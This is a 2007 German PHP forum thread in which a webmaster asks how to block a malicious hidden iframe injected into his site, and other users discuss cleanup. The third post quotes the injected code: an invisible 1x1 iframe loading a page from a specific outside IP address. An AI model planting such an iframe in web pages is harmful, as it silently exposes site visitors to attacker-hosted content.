php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Entwicklung > PHP Developer Forum
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


PHP Developer Forum Hier habt ihr die Möglichkeit, eure Skriptprobleme mit anderen Anwendern zu diskutieren. Seid so fair und beantwortet auch Fragen von anderen Anwendern. Dieses Forum ist sowohl für ANFÄNGER als auch für PHP-Profis! Fragen zu Laravel, YII oder anderen PHP-Frameworks.

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 22-05-2007, 18:12
andygyr
 Registrierter Benutzer
Links : Onlinestatus : andygyr ist offline
Registriert seit: Jan 2007
Beiträge: 183
andygyr ist zur Zeit noch ein unbeschriebenes Blatt
Standard Aufruf erkennen und blocken

hallo zusammen,
Ich habe das problem, das bei mir auf der Seite etwas aufgerugen, und zwar in einem Iframe.

Nun möchte ich, mit PHP, diesen aufruf blocken.
Das heisst also, das ich zuerst den zugriff auf eine Seite feststellen muss, und ihn nachher zu blocken.

Funktioniert das mit PHP?
Wenn ja, wie?
Mit Zitat antworten
  #2 (permalink)  
Alt 22-05-2007, 18:29
Shurakai
 Master
Links : Onlinestatus : Shurakai ist offline
Registriert seit: May 2004
Ort: Bergisch Gladbach
Beiträge: 3.084
Shurakai ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Erläutere dein Problem genauer. Kommt der Aufruf von einer externen Seite, die deinen Content einbindet?
Mit Zitat antworten
  #3 (permalink)  
Alt 22-05-2007, 18:43
andygyr
 Registrierter Benutzer
Links : Onlinestatus : andygyr ist offline
Registriert seit: Jan 2007
Beiträge: 183
andygyr ist zur Zeit noch ein unbeschriebenes Blatt
Standard

genauer gesagt handelt es sich um eine art Virus, der automatisch eingebunden wird.
81.95.149.26/logo/index.php auf diese adresse wird er aurfgerufen, mit folgendem code:
Code:
<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Nun könnte man sicher mit php den aufruf der Seite Blockieren, sodass auch nicht passiert.

ps:
Hab schon alles, probiert in sachen Virenprogrammen usw.
Mit Zitat antworten
  #4 (permalink)  
Alt 22-05-2007, 18:54
pekka
 PHP Master
Links : Onlinestatus : pekka ist offline
Registriert seit: Jun 2001
Ort: Köln
Beiträge: 6.608
pekka befindet sich auf einem aufstrebenden Ast
Standard

Hä?
Ich versteh kein Wort. Virus?
Bitte nochmal von Vorne erklären.
Mit Zitat antworten
  #5 (permalink)  
Alt 22-05-2007, 18:55
ArSeN
 Registrierter Benutzer
Links : Onlinestatus : ArSeN ist offline
Registriert seit: Feb 2006
Ort: Berlin
Beiträge: 1.052
ArSeN ist zur Zeit noch ein unbeschriebenes Blatt
ArSeN eine Nachricht über ICQ schicken ArSeN eine Nachricht über AIM schicken ArSeN eine Nachricht über Yahoo! schicken
Standard

1. Wieso kann der Benutzer bestimmten was in deinem Iframe eingebunden wird?
2. Wenn nicht, wieso bindest du dann diesen Virus ein?
3. Warum benutzt du überhaupt Iframes?
__________________
Nur wenige wissen, wieviel man wissen muss, um zu wissen, wie wenig man weiß.
Mit Zitat antworten
  #6 (permalink)  
Alt 22-05-2007, 19:00
andygyr
 Registrierter Benutzer
Links : Onlinestatus : andygyr ist offline
Registriert seit: Jan 2007
Beiträge: 183
andygyr ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Nun, der Virus wird automatisch eingebunden, und zwar in versteckten Iframes..
Mehr zum Virus:
http://www.google.ch/search?hl=de&q=81.95.149.26&meta=
Mit Zitat antworten
  #7 (permalink)  
Alt 22-05-2007, 19:03
ArSeN
 Registrierter Benutzer
Links : Onlinestatus : ArSeN ist offline
Registriert seit: Feb 2006
Ort: Berlin
Beiträge: 1.052
ArSeN ist zur Zeit noch ein unbeschriebenes Blatt
ArSeN eine Nachricht über ICQ schicken ArSeN eine Nachricht über AIM schicken ArSeN eine Nachricht über Yahoo! schicken
Standard

"automatisch"? Von wem oder was denn bitte? Von deinem Server? Verstehe ich nicht. Wieso antwortest du nicht auf meine Fragen?
__________________
Nur wenige wissen, wieviel man wissen muss, um zu wissen, wie wenig man weiß.
Mit Zitat antworten
  #8 (permalink)  
Alt 22-05-2007, 19:17
highrise
 Member
Links : Onlinestatus : highrise ist offline
Registriert seit: Apr 2006
Ort: zu Hause *g*
Beiträge: 257
highrise ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Wenn es einem schlauen aber bösen menschen gelingt, diesen Code in deiner Seite zu platzieren, hast du keine Möglichkeit, den Aufruf zu blocken, nachdem die Seite ausgeliefert wurde, da der Browser die Seite lädt, die in dem iframe dargestellt werden soll, ohne vorher bei deinem Server zu fragen, ob er das auch darf...

Die einzige Möglichkeit wäre, deine Seiten VOR der Auslieferung an den Browser auf den entsprechenden Code hin zu untersuchen und diesen zu entfernen.

Ist allerdings ein wenig umständlich, weil du wirklich jede Ausgabe parsen musst...

Informationen, wie der Hacker den schädlichen Code auf deiner Seite paltziert hat oder platzieren kann wären hilfreicher, um die Veränderung gleich von vornherein auszuschließen...

Ist das Kind erst in den Brunnen gefallen, dann ist die einfachste und schnellste Lösung natürlich, den Fraglichen Code von Hand zu bereinigen und neu zu veröffentlichen.

greetz, high
__________________
Good programming is 40% experience, 20% skill, 20% RTFM, 15% caffeine, and 5% attention to detail.
When everything else fails, manipulate the data...
Beschriftungen / Großformatdruck / Werbemittel
Mit Zitat antworten
  #9 (permalink)  
Alt 22-05-2007, 19:25
Kropff
  Administrator
Links : Onlinestatus : Kropff ist offline
Registriert seit: Mar 2002
Ort: Köln
Beiträge: 11.722
Kropff befindet sich auf einem aufstrebenden Ast
Standard

schau mal bei google vorbei, da gibt es einige infos zu dem thema.

gruß
peter
__________________
Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
Meine Seite
Mit Zitat antworten
  #10 (permalink)  
Alt 22-05-2007, 21:31
Benutzerbild von bUTschy bUTschy
 Registrierter Benutzer
Links : Onlinestatus : bUTschy ist offline
Registriert seit: Aug 2005
Ort: Hamburg
Beiträge: 152
bUTschy ist zur Zeit noch ein unbeschriebenes Blatt
Standard

hi

evtl hilft dir dieser link weiter
www.stoer-angler.de/.../viewtopic.php?t=562
__________________
4cms.de
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

PHP Server Monitor

PHP Server Monitor ist ein Skript, das prüft, ob Ihre Websites und Server betriebsbereit sind.

11.09.2018 Berni | Kategorie: PHP/ Security
PHP WEB STATISTIK ansehen PHP WEB STATISTIK

Die PHP Web Statistik bietet Ihnen ein einfach zu konfigurierendes Script zur Aufzeichnung und grafischen und textuellen Auswertung der Besuchern Ihrer Webseite. Folgende zeitlichen Module sind verfügbar: Jahr, Monat, Tag, Wochentag, Stunde Folgende son

28.08.2018 phpwebstat | Kategorie: PHP/ Counter
Affilinator - Affilinet XML Produktlisten Skript

Die Affilinator Affilinet XML Edition ist ein vollautomatisches Skript zum einlesen und darstellen der Affili.net (Partnerprogramm Netzwerk) Produktlisten und Produktdaten. Im Grunde gibt der Webmaster seine Affilinet PartnerID ein und hat dann unmittelb

27.08.2018 freefrank@ | Kategorie: PHP/ Partnerprogramme
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 19:10 Uhr.